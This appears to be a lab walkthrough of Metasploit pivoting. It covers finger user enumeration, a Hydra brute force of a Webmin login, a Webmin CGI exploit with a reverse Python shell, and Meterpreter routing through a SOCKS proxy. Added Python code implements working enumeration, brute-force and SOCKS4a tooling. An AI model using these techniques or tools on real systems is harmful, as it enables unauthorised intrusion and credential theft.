
Metasploit Pivoting II

Steps Taken:

1. Nmap the nearby network to find out what services the first target machine is running (version detection plus the banner script):

nmap -sV --script=banner 192.39.205.3

2. Enumerate users through the ‘finger’ service (port 79), feeding it candidate names from a wordlist:

	- Using the default wordlist:

	- Using the hinted wordlist:

3. Query the ‘finger’ service for details on the discovered user ‘access’:

finger access@{ip}
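As an added example (not code from the original post), here is the finger user enumeration of steps 2 and 3 done by hand in Python: one query per candidate name, classified by the daemon's reply. It runs offline against a constructed finger daemon bound to loopback; the fake account records, the wordlist and the set of "unknown user" markers are assumptions, and the real scan would point at port 79 on the target.

```python
import socket
import threading

# Constructed stand-in for the target's finger daemon: two hypothetical
# accounts with RFC 1288 style replies. Not data from the real host.
FAKE_USERS = {
    "access": "Login: access\t\tName: Access User\nDirectory: /home/access\tShell: /bin/bash\n",
    "root": "Login: root\t\t\tName: root\nDirectory: /root\t\tShell: /bin/bash\n",
}

def start_fake_fingerd():
    """Bind a minimal finger daemon to an ephemeral loopback port.
    Known names get a user record, anything else 'no such user'."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(16)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:          # listening socket closed: stop serving
                return
            with conn:
                query = conn.recv(1024).decode("ascii", "replace").strip()
                reply = FAKE_USERS.get(query, f"finger: {query}: no such user.\n")
                conn.sendall(reply.encode())

    threading.Thread(target=serve, daemon=True).start()
    return srv, srv.getsockname()[1]

def finger(host, port, user, timeout=3.0):
    """One finger query: send '<user>\\r\\n' and read until the server closes."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(f"{user}\r\n".encode("ascii"))
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode("utf-8", "replace")

# Strings fingerd implementations return for unknown accounts (assumed set;
# extend it after looking at one negative reply from the real target).
NEGATIVE_MARKERS = ("no such user", "not found", "unknown user", "???")

def user_exists(response):
    """Classify a reply: a negative marker means absent, a 'Login:' field means present."""
    low = response.lower()
    if any(marker in low for marker in NEGATIVE_MARKERS):
        return False
    return "login:" in low

def enumerate_users(host, port, wordlist):
    """Finger every candidate name and keep the ones the daemon confirms."""
    return [name for name in wordlist if user_exists(finger(host, port, name))]

def demo():
    """Run the enumeration against the fake daemon with a tiny constructed wordlist."""
    srv, port = start_fake_fingerd()
    try:
        return enumerate_users("127.0.0.1", port, ["root", "admin", "access", "guest"])
    finally:
        srv.close()

if __name__ == "__main__":
    print(demo())   # ['root', 'access']
```

The classification is the part worth checking before a real run: send one name you know is bogus, look at the exact text the daemon returns, and make sure it is in NEGATIVE_MARKERS, otherwise every name looks valid.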

4. Trying a GET request against the web service on this server:

- The plain HTTP request fails, so how can I make the request with SSL enabled?
- Add an 's' to make the scheme 'https':

- It still doesn't work, this time because of "EE certificate key too weak": OpenSSL's default security level refuses the server's end-entity certificate for having too short a key. This is a client-side policy check, not a connectivity problem; a client run at a lower security level (for an OpenSSL-backed curl, --ciphers 'DEFAULT:@SECLEVEL=1') completes the handshake.
5. Using the exploit/unix/webapp/webmin_show_cgi_exec module:

- Notice that the option we really need to fill in here is PASSWORD: the module has to authenticate to Webmin before it can reach the vulnerable CGI.
- Since we don't have it, we have to crack it for the username ‘access’.
6. Trying to fetch /etc/passwd with the module auxiliary/admin/webmin/file_disclosure:

	- Notice that the target answers, but you need to be authenticated first, which is ironic since we're trying to recover the passwords of this service's users.
	- The module starts from the /unauthenticated directory.
	- The response shows us the HTTPS login form: you have to log in first!
	- The important URI here is /session_login.cgi, which takes the login via a POST request.
	- The form field for the username box is 'user'.
	- The form field for the password box is 'pass'.
7. Cracking the password for user ‘access’ with Hydra:

hydra {target} -l access -P {wordlist} https-form-post "/session_login.cgi:user=^USER^&pass=^PASS^:{error_message}" -s 10000 -f -V

	-> {error_message} is the text the login page returns after a wrong password; Hydra will complain about the missing condition if you run it without one the first time, so submit one bad login by hand and copy what the page shows.
	-> The third field of the https-form-post argument takes either F=<string that appears on failure> or S=<string that appears only on success>; a bare string is treated as F=. F= is the right choice here because we know the failure text; S= is for cases where success is easier to recognize than failure (a redirect, or a 'logout' link that only a logged-in page has).
	-> "-s" sets the port of the web server (Webmin listens on 10000 here); "-l" is the single username, "-P" the password list, "-f" stops at the first valid pair and "-V" prints every attempt.
	-> In this case the wordlist used is /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
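To make the F= versus S= question concrete, here is an added example (not the post's own code and not Hydra) of the form-brute-force loop and its two success conditions, run against a constructed stand-in for Webmin's session_login.cgi on loopback. The valid credential, the failure banner, the 'logout' word and the wordlist are all assumptions; the stand-in speaks plain HTTP rather than HTTPS on 10000. The third run uses a failure string that never appears on the page, which is the classic way to get a false positive on the very first password.

```python
import threading
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed stand-in for the Webmin login form: one hypothetical valid
# credential, a failure banner of our own choosing and a word that only a
# successful login shows. None of this is the real target's output.
VALID_CREDS = {"access": "s3cret"}
FAILURE_TEXT = "Login failed, please try again"
SUCCESS_TEXT = "logout"

class FakeSessionLogin(BaseHTTPRequestHandler):
    def do_POST(self):
        if self.path != "/session_login.cgi":
            self.send_error(404)
            return
        length = int(self.headers.get("Content-Length", "0"))
        form = urllib.parse.parse_qs(self.rfile.read(length).decode())
        user = form.get("user", [""])[0]
        password = form.get("pass", [""])[0]
        if VALID_CREDS.get(user) == password:
            body = f"<html>Welcome {user} <a href='/session_logout.cgi'>{SUCCESS_TEXT}</a></html>".encode()
        else:
            body = f"<html>{FAILURE_TEXT}</html>".encode()
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):   # silence per-request logging
        pass

def start_fake_webmin():
    httpd = HTTPServer(("127.0.0.1", 0), FakeSessionLogin)
    threading.Thread(target=httpd.serve_forever, daemon=True).start()
    return httpd, httpd.server_address[1]

def parse_form_spec(spec):
    """Split a hydra-style 'path:body:condition' spec (colon escaping omitted).
    F=text means 'text appears on failure'; S=text means 'text appears only on
    success'; a bare third field is treated as F=, as hydra does."""
    path, body, cond = spec.split(":", 2)
    if cond.startswith("S="):
        return path, body, ("S", cond[2:])
    if cond.startswith("F="):
        return path, body, ("F", cond[2:])
    return path, body, ("F", cond)

def login_succeeded(page, cond):
    kind, text = cond
    return text in page if kind == "S" else text not in page

def post_login(base_url, path, body_template, user, password):
    data = (body_template.replace("^USER^", urllib.parse.quote(user))
                         .replace("^PASS^", urllib.parse.quote(password))).encode()
    req = urllib.request.Request(base_url + path, data=data, method="POST")
    req.add_header("Content-Type", "application/x-www-form-urlencoded")
    with urllib.request.urlopen(req, timeout=3) as resp:
        return resp.read().decode()

def brute_force(base_url, spec, user, wordlist):
    """Return the first password the condition accepts, or None."""
    path, body, cond = parse_form_spec(spec)
    for password in wordlist:
        if login_succeeded(post_login(base_url, path, body, user, password), cond):
            return password
    return None

WORDLIST = ["password", "123456", "s3cret", "letmein"]   # constructed

def demo():
    """Same wordlist under three conditions: a correct F=, an S=, and a wrong F=."""
    httpd, port = start_fake_webmin()
    base = f"http://127.0.0.1:{port}"
    form = "/session_login.cgi:user=^USER^&pass=^PASS^:"
    try:
        return {
            "F=correct": brute_force(base, form + "F=" + FAILURE_TEXT, "access", WORDLIST),
            "S=logout": brute_force(base, form + "S=" + SUCCESS_TEXT, "access", WORDLIST),
            "F=wrong": brute_force(base, form + "F=Invalid login", "access", WORDLIST),
        }
    finally:
        httpd.shutdown()
        httpd.server_close()

if __name__ == "__main__":
    print(demo())   # {'F=correct': 's3cret', 'S=logout': 's3cret', 'F=wrong': 'password'}
```

The "F=wrong" result is the one to remember: a failure string that is never present makes every attempt look like a hit, and Hydra with -f would stop on the first password in the list. Verify the string against a known-bad login before trusting a "found" result.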

8. Executing the exploit with the cracked password:

- The exploit runs but doesn't create a session for some reason (typically because the default payload depends on an interpreter or binary the target doesn't have, so the command executes but the callback never comes).
- After trying different payloads, it works with cmd/unix/reverse_python:

9. Upgrade the shell into a Meterpreter shell:

msf > sessions -u 1

- Now you can get information about the internal subnet of the first target machine from the Meterpreter session.

- Internal subnet = 192.121.3.0/24
10. Creating a pivot through this compromised machine:

- Add a route to 192.121.3.0/24 through the Meterpreter session, then a SOCKS4a proxy as well, so the internal machine can be scanned from the attacker's machine through proxychains.

Note: when ‘portfwd’ is used you don't need proxychains at all, because the forwarded port shows up as a local port on the attacker's machine. Look at the walkthrough for the alternative using ‘portfwd’ without proxychains. The SOCKS route is what you want when a tool can't be run from inside Metasploit: proxychains lets any tool (nmap, a standalone exploit) reach the internal network through the pivot.

11. Scanning the internal target machine from the attacker's machine with nmap through proxychains:

- Only TCP connect() calls are carried through the proxy, so use a connect scan and skip host discovery (-sT -Pn); SYN scans and ICMP pings never leave the attacker's machine.
- Since the service and its version show up through the proxy, the port is reachable from the pivot as it is, so there is no need to set up a portfwd from the Meterpreter shell just to get at it.
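An added example (not from the original post) of what proxychains does for every connect() the wrapped tool makes once the SOCKS4a proxy is up: the SOCKS4a CONNECT handshake written by hand, then a banner read over the resulting stream. It runs against a constructed loopback proxy that stands in for Metasploit's socks server and answers with a constructed FTP banner; the hostname 'internal-host' and the banner text are assumptions. The detail it makes visible is why version 4a matters for pivoting: the request carries the destination hostname with 0.0.0.1 as the address, so name resolution happens on the pivot rather than on the attacker's machine.

```python
import socket
import struct
import threading

def socks4a_connect_request(host, port, userid=b""):
    """SOCKS4a CONNECT: VN=4, CD=1, DSTPORT, DSTIP=0.0.0.1 (the '4a' marker),
    USERID NUL, then the hostname NUL so the proxy resolves it itself."""
    if isinstance(host, str):
        host = host.encode("idna")
    return struct.pack("!BBH4s", 4, 1, port, b"\x00\x00\x00\x01") + userid + b"\x00" + host + b"\x00"

def parse_socks4_reply(reply):
    """Reply is 8 bytes: VN=0, CD=0x5A granted / 0x5B-0x5D rejected, port, IP."""
    if len(reply) != 8 or reply[0] != 0:
        raise ValueError("malformed SOCKS4 reply")
    return reply[1] == 0x5A

def _recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed during SOCKS handshake")
        buf += chunk
    return buf

def connect_via_socks4a(proxy_host, proxy_port, dest_host, dest_port, timeout=3.0):
    """Open a TCP stream to dest_host:dest_port through the proxy. On success the
    returned socket behaves like a direct connection to the internal host."""
    sock = socket.create_connection((proxy_host, proxy_port), timeout=timeout)
    try:
        sock.sendall(socks4a_connect_request(dest_host, dest_port))
        reply = _recv_exact(sock, 8)
        if not parse_socks4_reply(reply):
            raise ConnectionError(f"proxy refused CONNECT, code 0x{reply[1]:02x}")
    except Exception:
        sock.close()
        raise
    return sock

# --- constructed stand-in for the pivot's SOCKS4a server -------------------
REACHABLE = {"internal-host"}                          # hypothetical name the pivot resolves
FAKE_BANNER = b"220 ProFTPD 1.3.3c Server ready.\r\n"  # constructed banner, not a capture

def start_fake_socks4a_proxy():
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(8)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            with conn:
                req = conn.recv(1024)
                if len(req) < 9:
                    continue
                ver, cmd, port, ip = struct.unpack("!BBH4s", req[:8])
                fields = req[8:].split(b"\x00")
                hostname = fields[1].decode() if ip[:3] == b"\x00\x00\x00" and len(fields) > 1 else None
                if ver == 4 and cmd == 1 and hostname in REACHABLE:
                    conn.sendall(b"\x00\x5a" + req[2:8])   # granted; echo port and IP
                    conn.sendall(FAKE_BANNER)               # the "internal service" talks
                else:
                    conn.sendall(b"\x00\x5b" + req[2:8])   # request rejected

    threading.Thread(target=serve, daemon=True).start()
    return srv, srv.getsockname()[1]

def grab_banner_via_proxy(proxy_port, dest_host, dest_port=21):
    """What a banner grab through the pivot returns: read until the peer closes."""
    with connect_via_socks4a("127.0.0.1", proxy_port, dest_host, dest_port) as s:
        data = b""
        while True:
            chunk = s.recv(1024)
            if not chunk:
                break
            data += chunk
    return data.decode().strip()

def demo():
    """One granted CONNECT (banner comes back) and one refused (proxy says 0x5B)."""
    srv, port = start_fake_socks4a_proxy()
    try:
        banner = grab_banner_via_proxy(port, "internal-host")
        try:
            grab_banner_via_proxy(port, "other-host")
            refused = False
        except ConnectionError:
            refused = True
        return banner, refused
    finally:
        srv.close()

if __name__ == "__main__":
    print(demo())   # ('220 ProFTPD 1.3.3c Server ready.', True)
```

Against the real pivot you would point connect_via_socks4a at the port Metasploit's socks proxy listens on and at a 192.121.3.x address. Nmap under proxychains performs this same CONNECT for every port it probes, which is why only a TCP connect scan works through it and why a closed port shows up as a 0x5B refusal from the proxy rather than a RST from the host.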
12. Check whether there are public exploits for this service and version:

searchsploit proftpd 1.3.3c

- Use this!

This post is licensed under CC BY 4.0 by the author.